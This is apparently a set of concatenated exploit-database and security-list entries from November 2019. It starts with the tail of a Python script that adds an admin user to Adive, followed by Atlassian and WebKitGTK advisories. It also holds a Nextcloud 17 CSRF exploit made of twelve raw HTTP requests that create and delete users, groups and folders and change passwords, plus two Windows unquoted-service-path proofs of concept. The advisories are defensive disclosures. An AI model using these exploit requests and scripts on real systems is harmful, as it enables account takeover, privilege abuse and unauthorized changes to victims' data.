request = session.post(host+'/adive/admin/user/add', data=data,
headers=headers, proxies=proxyDict)
print('+--------------------------------------------------+')

else:
print ('Passwords dont match!!!')

#PoC
https://imgur.com/dUgLYi6
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This email refers to the advisory found at
https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-11-06-979412717.html
.


CVE ID:

* CVE-2019-15003
* CVE-2019-15004



Product: Jira Service Desk Server and Data Center.

Affected Jira Service Desk Server and Data Center product versions:

version < 3.9.17
3.10.0 <= version < 3.16.11
4.0.0 <= version < 4.2.6
4.3.0 <= version < 4.3.5
4.4.0 <= version < 4.4.3
4.5.0 <= version < 4.5.1


Fixed Jira Service Desk Server and Data Center product versions:

* for 3.9.x, Jira Service Desk Server and Data Center 3.9.17 has been released
with a fix for this issue.
* for 3.16.x, Jira Service Desk Server and Data Center 3.16.11 has been released
with a fix for this issue.
* for 4.2.x, Jira Service Desk Server and Data Center 4.2.6 has been released
with a fix for this issue.
* for 4.3.x, Jira Service Desk Server and Data Center 4.3.5 has been released
with a fix for this issue.
* for 4.4.x, Jira Service Desk Server and Data Center 4.4.3 has been released
with a fix for this issue.
* for 4.5.x, Jira Service Desk Server and Data Center 4.5.1 has been released
with a fix for this issue.


Summary:
This advisory discloses a critical severity security vulnerability. Versions of
Jira Service Desk Server and Data Center  are affected by this vulnerability.



Customers who have upgraded Jira Service Desk Server and Data Center to version
3.9.17 or 3.16.11 or 4.2.6 or 4.3.5 or 4.4.3 or 4.5.1 are not affected.

Customers who have downloaded and installed Jira Service Desk Server and Data
Center less than 3.9.17 (the fixed version for 3.9.x) or who have downloaded and
installed Jira Service Desk Server and Data Center >= 3.10.0 but less than
3.16.11 (the fixed version for 3.16.x) or who have downloaded and installed Jira
Service Desk Server and Data Center >= 4.0.0 but less than 4.2.6 (the fixed
version for 4.2.x) or who have downloaded and installed Jira Service Desk Server
and Data Center >= 4.3.0 but less than 4.3.5 (the fixed version for 4.3.x) or
who have downloaded and installed Jira Service Desk Server and Data Center >=
4.4.0 but less than 4.4.3 (the fixed version for 4.4.x) or who have downloaded
and installed Jira Service Desk Server and Data Center >= 4.5.0 but less than
4.5.1 (the fixed version for 4.5.x) please upgrade your Jira Service Desk Server
and Data Center installations immediately to fix this vulnerability.



URL path traversal allows information disclosure - CVE-2019-15003

Severity:
Atlassian rates the severity level of this vulnerability as critical, according
to the scale published in our Atlassian severity levels. The scale allows us to
rank the severity as critical, high, moderate or low.
This is our assessment and you should evaluate its applicability to your own IT
environment.


Description:

By design, Jira Service Desk gives customer portal users permissions only to
raise requests and view issues. This allows users to interact with the customer
portal without having direct access to Jira. These restrictions can be bypassed
by a remote attacker with portal access who exploits a path traversal
vulnerability. Note that attackers can grant themselves access to Jira Service
Desk portals that have the Anyone can email the service desk or raise a request
in the portal setting enabled. Exploitation allows an attacker to view all
issues within all Jira projects contained in the vulnerable instance. This could
include Jira Service Desk projects, Jira Core projects, and Jira Software
projects.
Versions of Jira Service Desk Server and Data Center all versions before 3.9.17
(the fixed version for 3.9.x), from version 3.10.0 before 3.16.10 (the fixed
version for 3.16.x), from version 4.0.0 before 4.2.6 (the fixed version for
4.2.x), from version 4.3.0 before 4.3.5 (the fixed version for 4.3.x), from
version 4.4.0 before 4.4.3 (the fixed version for 4.4.x), and from version 4.5.0
before 4.5.1 (the fixed version for 4.5.x) are affected by this vulnerability.
This issue can be tracked at: https://jira.atlassian.com/browse/JSDSERVER-6589
.



Fix:

To address this issue, we've released the following versions containing a fix:

* Jira Service Desk Server and Data Center version 3.9.17
* Jira Service Desk Server and Data Center version 3.16.11
* Jira Service Desk Server and Data Center version 4.2.6
* Jira Service Desk Server and Data Center version 4.3.5
* Jira Service Desk Server and Data Center version 4.4.3
* Jira Service Desk Server and Data Center version 4.5.1

Remediation:

Upgrade Jira Service Desk Server and Data Center to version 4.5.1 or higher.

The vulnerabilities and fix versions are described above. If affected, you
should upgrade to the latest version immediately.

If you are running Jira Service Desk Server and Data Center 3.9.x and cannot
upgrade to 4.5.1, upgrade to version 3.9.17.
If you are running Jira Service Desk Server and Data Center 3.16.x and cannot
upgrade to 4.5.1, upgrade to version 3.16.11.
If you are running Jira Service Desk Server and Data Center 4.2.x and cannot
upgrade to 4.5.1, upgrade to version 4.2.6.
If you are running Jira Service Desk Server and Data Center 4.3.x and cannot
upgrade to 4.5.1, upgrade to version 4.3.5.
If you are running Jira Service Desk Server and Data Center 4.4.x and cannot
upgrade to 4.5.1, upgrade to version 4.4.3.


For a full description of the latest version of Jira Service Desk Server and
Data Center, see
the release notes found at
https://confluence.atlassian.com/servicedesk/jira-service-desk-release-notes-780083086.html.
You can download the latest version of Jira Service Desk Server and Data Center
from the download centre found at
https://www.atlassian.com/software/jira/service-desk/download.



Support:
If you have questions or concerns regarding this advisory, please raise a
support request at https://support.atlassian.com/.


-----BEGIN PGP SIGNATURE-----

iQJLBAEBCgA1FiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAl3E4DkXHHNlY3VyaXR5
QGF0bGFzc2lhbi5jb20ACgkQJCCXorxSdqCHlhAAms1Ea3KA/TJEtsdOtlH3kw4h
1wN3Pk18v986BwDsE06pO3HsY8ra608o1Pzx++AVdLnPQU+fIBUfg2SKBIn/ACGS
7s8qKCzcveZsCnZqHJaaSNYubGxiT20QnxfBDh8tTCJzp0m5s9zdArNb4kITUsWT
pLH0gQ/cPx4Ureb8nO2JpcpU9joJdAODU7NCF+jRCmDreYJBWwROGtCnP4VPmquC
v0CsvfMAFENscvAszxAybXNG5CoiBjb0+qwJq8K6yWeu6c5kwGoh7k90Hk5JdDJm
z1MTJb6T9FTHvlmfGUfCOVFpvFtuNzFaPBhxfKaHHYlksOnXzTHztlJsi+nuojyE
FAONVh3Fcq+cL2DB/jAOxnBgcWvOIWYkgNkRFyZIZ+y09LuFTowzlShy9+RC9+0z
kH+w7HKgA0gSeJvvrgTW5BUaOklvT7wVKMmG+aEz0w32kJhPwPIgcPtIQ2uAYj9C
uJKP5FwKULoWUXMDWclrY3xMxSRL/g7bv0ZAVlGzLdtFBkr0zZexdm/FJoAr7nQU
7Et0TjVKHzr00Y0kCVO/fmN3BWK12iNrOZZ1Vo4j/u8xL7BxqqimrlN1jfv+46lt
t8LF2JwCaVV9qirrVJDj6T650aLyXdKgTYrrvJtXjCnmnhixd/t1yDcnd585iKva
xgbVIqGBDtaP+lRrsTs=
=TvXO
-----END PGP SIGNATURE-----

# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
# Date: 08.11.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://nextcloud.com
# Software Link: https://nextcloud.com/install/#instructions-server
# Version: 17



#Nextcloud offers the industry-leading, on-premises content collaboration
platform.
#Our technology combines the convenience and ease of use of consumer-grade
solutions like Dropbox and Google Drive with the security, privacy and
control business #needs.

##################################################################################################################################

# CSRF1
# Create Folder

MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1


##################################################################################################################################

# CSRF2
# Delete Folder

DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1


##################################################################################################################################

# CSRF3
# Create User

POST /ocs/v2.php/cloud/users HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken:
qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Content-Length: 129
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1

{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}



##################################################################################################################################

# CSRF4
# Delete User

DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1


##################################################################################################################################

# CSRF5
# Disable User

PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0


##################################################################################################################################

# CSRF6
# Enable User

PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0


##################################################################################################################################

# CSRF7
# Create Group

POST /ocs/v2.php/cloud/groups HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken:
EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Content-Length: 18
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1

{"groupid":"test"}


##################################################################################################################################

# CSRF8
# Delete Group

DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1


##################################################################################################################################

# CSRF9
# Change User Full Name


PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken:
nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 266
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1

{"displayname":"Ozer
Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}


##################################################################################################################################

# CSRF10
# Change User Email

PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken:
I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 271
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1

{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test
","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}


##################################################################################################################################

# CSRF11
# Change Language

PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1

key=language&value=tr


##################################################################################################################################

# CSRF12
# Change User Password

POST /settings/personal/changepassword HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1

oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678


##################################################################################################################################

------------------------------------------------------------------------
WebKitGTK and WPE WebKit Security Advisory                 WSA-2019-0006
------------------------------------------------------------------------

Date reported           : November 08, 2019
Advisory ID             : WSA-2019-0006
WebKitGTK Advisory URL  : https://webkitgtk.org/security/WSA-2019-0006.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0006.html
CVE identifiers         : CVE-2019-8710, CVE-2019-8743, CVE-2019-8764,
                          CVE-2019-8765, CVE-2019-8766, CVE-2019-8782,
                          CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
                          CVE-2019-8812, CVE-2019-8813, CVE-2019-8814,
                          CVE-2019-8815, CVE-2019-8816, CVE-2019-8819,
                          CVE-2019-8820, CVE-2019-8821, CVE-2019-8822,
                          CVE-2019-8823.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-8710
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to found by OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8743
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to zhunki from Codesafe Team of Legendsec at Qi'anxin Group.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8764
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to Sergei Glazunov of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    universal cross site scripting. Description: A logic issue was
    addressed with improved state management.

CVE-2019-8765
    Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
    2.24.3.
    Credit to Samuel Groß of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8766
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to found by OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8782
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to Cheolung Lee of LINE+ Security Team.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8783
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Cheolung Lee of LINE+ Graylab Security Team.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8808
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to found by OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8811
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Soyeon Park of SSLab at Georgia Tech.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8812
    Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before
    2.26.2.
    Credit to an anonymous researcher.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8813
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to an anonymous researcher.
    Impact: Processing maliciously crafted web content may lead to
    universal cross site scripting. Description: A logic issue was
    addressed with improved state management.

CVE-2019-8814
    Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before
    2.26.2.
    Credit to Cheolung Lee of LINE+ Security Team.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8815
    Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
    2.26.0.
    Credit to Apple.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8816
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Soyeon Park of SSLab at Georgia Tech.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8819
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Cheolung Lee of LINE+ Security Team.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8820
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Samuel Groß of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8821
    Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
    2.24.3.
    Credit to Sergei Glazunov of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8822
    Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
    2.24.3.
    Credit to Sergei Glazunov of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.

CVE-2019-8823
    Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
    2.26.1.
    Credit to Sergei Glazunov of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to
    arbitrary code execution. Description: Multiple memory corruption
    issues were addressed with improved memory handling.


We recommend updating to the latest stable versions of WebKitGTK and WPE
WebKit. It is the best way to ensure that you are running safe versions
of WebKit. Please check our websites for information about the latest
stable releases.

Further information about WebKitGTK and WPE WebKit security advisories
can be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.

The WebKitGTK and WPE WebKit team,
November 08, 2019

# Exploit Title: _GCafé 3.0  - 'gbClienService' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-09
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage: https://gcafe.vn/
# Software Link:  https://gcafe.vn/post/view?slug=gcafe-3.0
# Version: v3.0
# Tested on: Windows 7, Win 10, WinXP
# CVE : N/A  
# Description:
# GCafé 3.0 - Internet Cafe is a software that supports the management of public Internet access points

# PoC:

# wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
gbClientService    gbClientService    C:\Program Files\GBillingClient\gbClientService.exe    Auto
#C:\>sc qc gbClientService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: gbClientService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\GBillingClient\gbClientService.exe
        LOAD_ORDER_GROUP   : GarenaGroup
        TAG                : 0
        DISPLAY_NAME       : gbClientService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

# Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path
# Date: 2019-11-07
# Exploit Author: Héctor Gabriel Chimecatl Hernández
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1.0.10
# Tested on: Windows 10 Home Single Language x64 Esp

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

# Service info:

Alps HID Monitor Service  ApHidMonitorService  C:\Program Files\Apoint2K\HidMonitorSvc.exe  Auto

C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ApHidMonitorService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
        GRUPO_ORDEN_CARGA  :
